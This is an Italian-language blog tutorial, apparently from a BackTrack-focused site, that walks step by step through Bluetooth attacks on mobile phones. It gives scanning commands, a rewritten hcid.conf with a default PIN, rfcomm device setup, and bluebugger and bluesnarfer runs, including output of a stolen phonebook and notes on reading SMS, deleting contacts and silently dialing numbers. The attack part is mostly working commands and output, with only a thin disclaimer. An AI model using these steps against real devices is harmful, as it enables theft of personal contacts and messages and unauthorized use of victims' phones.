Bluetooth Sniff with Bluebugger & Bluesnarfer

Ciao a tutti,

eccoci arrivati a descrivere un nuovo campo di lavoro per noi del «back|track~blog , stò parlando come da titolo del Bluetooth sniffer.

I tool che useremo sono il Bluebugger ed il Bluesnarfer.

Il Bluebugger è un prodotto della Codito.de , ossia il sito di Martin J. Muench developper di BackTrack.

Prima di comunciare è doveroso dirvi che ovviamente per provare/testare questo tutorial avete bisogno di un Bluetooth device regolarmente riconosciuto da BackTrack , per essere sicuri potete vedere su Google cosa è riconosciuto o meno dai sistemi basati su GNU/Linux in generale , oppure lasciate qualche commento e vediamo cosa riusciamo a fare , oppure ancora entrate in canale e chiedete.

Ma iniziamo il nostro lavoro…..

Appena entriamo in BT , inseriamo la nostra chiavetta usb-bluetooth , e vediamo subito se il dispositivo è riconosciuto dal sistema dando da konsole il comando:

hciconfig

vedremo subito se il dispositio è riconosciuto , dopodiché per attivarlo basta dare il comando:

hciconfig hci0 up

Questo perché il mio dispositivo è visto da BT come hci0 , (hci-zero) , ma finora non ho sentito di dispositivi bluetooth indicati da BT con sigle diverse.

Per essere sicuri che il vostro dispositivo stia lavorando date da konsole il comando:

hciconfig -a

Dovrebbe restituirvi tutta la configurazione del dispositivo.

Ora , in BT ci sono una serie di strumenti per l’ utilizzo in vario modo di connessioni bluetooth chiamati Bluez , e noi iniziamo con il Hcitool , e lo facciamo tramite un piccolo scanning , dando da konsole il comando:

hcitool scan hci0

Questo il risultato che a me restituisce BT dopo aver messo in connettività bluetooth il mio telefono cellulare:

[root@bt ~]$ hcitool scan hci0
Scanning …
00:15:B9:57:80:C0 HaCkLaB-PH

Se non vi vedete arrivare nessun risultato provate a dare il comando BTscanner , oppure ancora a lanciare il BTscanner da backtrck->RadioNetworkAnalisys->Bluetooth->…

Oppure ancora , suate sicuri dell’ attività del cellulare.

Questo è il risultato dato dal mio cellulare , ma in caso di un attacco , o meglio di uno sniffing sarebbe stata la stessa cosa , il sistema mi avrebbe restituito tutti i MacAddress ,(BD) , che avevano il bluetooth attivato , e vi assicuro che provando in una casa isolata non c’é scampo , ma se vi mettete in un aeroporto in una stazione o in un luogo del genere potete immaginare voi lo sniffing che un “malintenzionato” potrebbe fare.

Ecco infatti appena utilizziamo un altro tool , l’ sdptool , cosa riusciamo a vedere nel dispositivo:

brigante ~HaCkLaB.WiFu # sdptool browse 00:15:B9:57:80:C0
Browsing 00:15:B9:57:80:C0 …
Service Name: QC Voice Gateway
Service RecHandle: 0×10000
Service Class ID List:
“Headset Audio Gateway” (0×1112)
“Generic Audio” (0×1203)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“Headset” (0×1108)
Version: 0×0100

Service Name: QC Voice Gateway
Service RecHandle: 0×10001
Service Class ID List:
“Handfree Audio Gateway” (0×111f)
“Generic Audio” (0×1203)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“Handsfree” (0×111e)
Version: 0×0101

Service Name: FTP
Service RecHandle: 0×10002
Service Class ID List:
“OBEX File Transfer” (0×1106)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 16
“OBEX” (0×0008)
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“OBEX File Transfer” (0×1106)
Version: 0×0100

Service Name: OPP
Service RecHandle: 0×10003
Service Class ID List:
“OBEX Object Push” (0×1105)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 17
“OBEX” (0×0008)
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“OBEX Object Push” (0×1105)
Version: 0×0100

Service Name: Serial Port
Service RecHandle: 0×10004
Service Class ID List:
“Serial Port” (0×1101)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 18
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“Serial Port” (0×1101)

Service Name: Dial-up Networking
Service RecHandle: 0×10005
Service Class ID List:
“Dialup Networking” (0×1103)
Protocol Descriptor List:
“L2CAP” (0×0100)
“RFCOMM” (0×0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0×656e
encoding: 0×6a
base_offset: 0×100
Profile Descriptor List:
“Dialup Networking” (0×1103)
Version: 0×0100

Bene , arrivati a questo punto voi direte , ma alla fine non è che hai ricavato molto , sono solo notizie riguardanti le porta di comunicazione , ma abbiate solo un pò di pazienza….

Tramite la konsole ed un editor di testi , nel mio caso Kate , apritevi il file di configurazione di Hdci , diamo quindi da konsole il comando:

kate /etc/bluetooth/hcid.conf

Al suo interno , andate a sostituire il tutto con le stringhe seguenti:

Sia chiaro che consiglio caldamente a tutti di farsi i propri backup , non rovinatevi la vita se non siete sicuri di ciò che fate.

Attenzione:

***[code]***

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}

***[/code]***

Ora è stato inserito come PIN , “1234” le 4 cifre internazionalmente di default sulla maggiorparte dei cellulari , ma tramite le opzioni a disposizione , e sempre in caso di un vero attacco , si sarebbe potuto pensare ad un attacco tramite brute-forcing. e comunque chi usa spesso il bluetooth non credo vogliastare sempre lì a digitare il PIN.

Fatto questo , salvate il tutto sovrascrivendo quindi totalmente il file di configurazione di Hdi , e date di nuovo da konsole per un nuovo UPil comando hciconfig -a

vi verrà restituito nuovamente il messaggio in stile con quello precedentemente ricavato tramite lo stesso comando , solo che noterete qualche piccolo cambiamento dato che , come potete vedere dalle righe stesse , abbiamo abilitato lo sniffing.

Ora facciamo il restart del dispositivo e ssociamovi i permessi ideali con i seguen ti comandi:

bash /etc/rc.d/rc.bluetooth restart

Dopodiché:

mknod -m 666 /dev/rfcomm0 c 216 3

mknod -m 666 /dev/rfcomm1 c 216 6

mknod -m 666 /dev/rfcomm2 c 216 7

Come potete benissimo notare non abbiamo fatto altro che creare prima ed associare poi tre connessioni che rispettivamente andranno ad occupare tre diversi canali , il primo RFCOMM0 nel canale 3 “DUN Dial UP” ; Il secondo RFCOMM1 attivo sulcanale 6 FTP , ed il terzo RFCOMM2 attivo nel canale 7 chiamato “OBEX push”.

Andiamo ora ad aggiungere i canali attivi al tool sdptool , da konsole quindi:

sdptool add –channel=3 DUN

sdptool add –channel=6 FTP

sdptool add –channel=7 OPUSH

Dopo aver configurato il tutto correttamente passiamo ora alla parte dello sniffing…

Per far lavorare i due programmi che ci servono per lo sniffing , non dobbiamo fare altro che lanciarli da Shell , oppure se si vuole ottenere direttamente la shell con il menù , vi basta lanciarli dal KdeMenuStart->BckTrack->Radio&NetworkAnalisys->Bluetooth->…..

brigante ~HaCkLaB.WiFu # bluebugger

bluebugger 0.1 ( MaJoMu | www.codito.de )
—————————————–

Usage: bluebugger [OPTIONS] -a <addr> [MODE]

-a <addr> = Bluetooth address of target

Options:
——–
-m <name> = Name to use when connecting (default: ”)
-d <device> = Device to use (default: ‘/dev/rfcomm’)
-c <channel> = Channelto use (default: 17)
-n = No device name lookup
-t <timeout> = Timeout in seconds for name lookup (default: 5)
-o <file> = Write output to <file>

Mode:
—–
info = Read Phone Info (default)
phonebook = Read Phonebook (default)
messages = Read SMS Messages (default)
dial <num> = Dial number
ATCMD = Custom Command (e.g. ‘+GMI’)

Note: Modes can be combined, e.g. ‘info phonebook +GMI’

* You have to set txxhe target address

Associamo al comando una nostra stringa , solo per fare una prova….

brigante ~HaCkLaB.WiFu # bluebugger -a 00:15:B9:57:80:C0 info

bluebugger 0.1 ( MaJoMu | www.codito.de )
—————————————–

Target Device: ‘00:15:B9:57:80:C0′
Target Name: ‘HaCkLaB-PH’

tcgetattr failed: Input/output error
bt_rfcomm_config() failed
…done

Quì il mio telefono si blocca e mi restituisce l’ autorizzazione allo scambio di dialogo : (

Proviamo invece a vedere con il bluesnarfer cosa succede con un cellulare diverso (un pò più vecchiotto a dire il vero….).

Queste le opzioni del Bluesnarfer:

brigante ~HaCkLaB.WiFu # bluesnarfer
bluesnarfer: you must set bd_addr
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD : valid AT+CMD (GSM EXTENSION)

TYPE : valid phonebook type ..
example : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more

-b bdaddr : bluetooth device address
-C chan : bluetooth rfcomm channel

-c ATCMD : custom action
-r N-M : read phonebook entry N to M
-w N-M : delete phonebook entry N to M
-f name : search “name” in phonebook address
-s TYPE : select phonebook memory storage
-l : list aviable phonebook memory storage
-i : device info

[root@bt ~]$ bluesnarfer -r -1-100 -b 00:79:S9:77:99:R0

+1 Angelo 049936XXXX

+2 Anta 049936XXXX

+3 AntonellaP 049936XXXX

+4 Giuseppe 049936XXXX

+5 Zio AXXXX 0XXX5XXX56

E la lista potrebbe continuare fino a nostro piacimento

In questo caso il Bluesnarfing ha funzionato benissimo , se eravamo dei malintenzionati , e se solo avessimo voluto avremmo potuto ricevere e cancellare tutta la lista di numeri che erano in rubrica sul telefono.

Le opzioni poi potete vederle benissimo , c’é dallo sniffing dei messaggi , fino al Dial-UP , ossia la possibilità di chiamare in quiet un qualsiasi numero di telefono utilizzando la linea del cellulare attaccato.

Capirete quindi in condizioni ideali che strumento possiamo avere a disposizione.

Oggi gli strumenti mediatici che usano il bluetooth sono moltissimi , non solo cellulari , ma palmari , stampanti , tutti gli strumenti che posso essere collegati ad un pc , e stando ai test che ho fatto , si riesce a trovare compatibilità e riuscita , almeno una volta su cinque.

Lo sniffing con dispositivi bluetooth è una cosa attraente ma anche molto pericolosa , ricordate che le tracce del segnale del vostro telefono sono monitorate quindi spero che non pensiate minimamente di trarre da questo tutorial notizie che possano servirvi a scopi illegali… ….come sempre , nessuno si prenderà responsabilità a riguardo.

Detto questo , in campo di telefonia come del resto riguarda l’ hardware in genere se si ha il mezzo giusto , ed in questo caso il nostro telefono cellulare , si possono arrivare a fare delle belle prove , ma a volte com’è successo a me, per configurare il dispositivo possono passare delle giornate.

Sto cercando di fare l’ UPload di un vecchio video realizzato con Audithor , e creato sempre dal team di remote-exploit , appena posso lo linko nella pagina dei video , in modo tale da poter rendere bene l’ idea.

Ciao a tutti e alla prossima.

La parte di configurazione del tutorial è stata presa da un thrade di Dr_GreeN sul Forums.Remote-exploit , l’ esperimento è nostro.

6 Commenti

Commenti RSS TrackBack Identifier URI